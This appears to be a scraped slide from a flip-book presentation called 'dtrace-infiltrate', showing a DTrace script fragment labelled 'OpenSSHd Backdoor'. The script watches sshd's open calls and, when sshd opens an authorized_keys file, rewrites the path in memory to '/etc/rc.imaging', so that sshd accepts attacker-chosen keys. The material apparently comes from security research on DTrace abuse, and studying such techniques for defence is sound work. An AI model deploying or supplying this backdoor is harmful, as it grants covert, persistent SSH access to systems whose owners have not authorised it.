dtrace-infiltrate
dtrace-infiltrate
dtrace-infiltrate
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
OpenSSHd Backdoor<br />
gotpass=1 enables probes in fstat64/open and read.<br />
Open probe begins the process, checking for<br />
“authorized_keys” filename.<br />
syscall::open*:entry<br />
/(gotpass == 1) && execname == "sshd" &&<br />
(strstr(copyinstr(arg0,200),"authorized_keys") != 0)/<br />
{<br />
printf("[+] sshd open: %s\n",copyinstr(arg0,200));<br />
printf("[+] replacing with \"/etc/rc.imaging\".\n");<br />
copyoutstr("/etc/rc.imaging",arg0,strlen(copyinstr(arg0,200)));<br />
self->authkey = 1;<br />
printf("[+] This is pid: %u\n",pid);<br />
}